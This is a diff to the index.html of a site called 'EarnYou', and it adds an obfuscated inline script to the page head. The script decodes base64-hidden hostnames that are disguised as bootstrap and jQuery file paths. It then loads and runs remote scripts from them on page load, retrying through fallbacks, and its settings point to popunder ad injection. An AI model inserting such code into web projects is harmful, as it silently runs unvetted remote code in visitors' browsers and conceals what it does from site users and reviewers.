--- a/index.html
+++ b/index.html
@@ -3,6 +3,12 @@
 <head>
 <meta charset="utf-8">
   <meta name="ppck-ver" content="9c707dc0391cc353905a13b3beb4889c" />
+  <script type="text/javascript" data-cfasync="false">
+/*<![CDATA[/* */
+(function(){var r=window,o="ad41453d48c9ec69660e02f1468fa366",g=[["siteId",735*229+256+499-835+5095448],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],z=["d3d3LmNkbjRhZHMuY29tL2Vhbmd1bGFyLWZvcm1seS10ZW1wbGF0ZXMtYm9vdHN0cmFwLm1pbi5jc3M=","ZDNnNW92Zm5nanc5YncuY2xvdWRmcm9udC5uZXQvQXpUdVIvYXN1cnZleS5qcXVlcnkubWluLmpz"],a=-1,n,b,d=function(){clearTimeout(b);a++;if(z[a]&&!(1792561743000<(new Date).getTime()&&1<a)){n=r.document.createElement("script");n.type="text/javascript";n.async=!0;var x=r.document.getElementsByTagName("script")[0];n.src="https://"+atob(z[a]);n.crossOrigin="anonymous";n.onerror=d;n.onload=function(){clearTimeout(b);r[o.slice(0,16)+o.slice(0,16)]||d()};b=setTimeout(d,5E3);x.parentNode.insertBefore(n,x)}};if(!r[o]){try{Object.freeze(r[o]=g)}catch(e){}d()}})();
+/*]]>/* */
+</script>
+
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>EarnYou — Learn & Earn Smarter</title>
   <meta name="keywords" content="
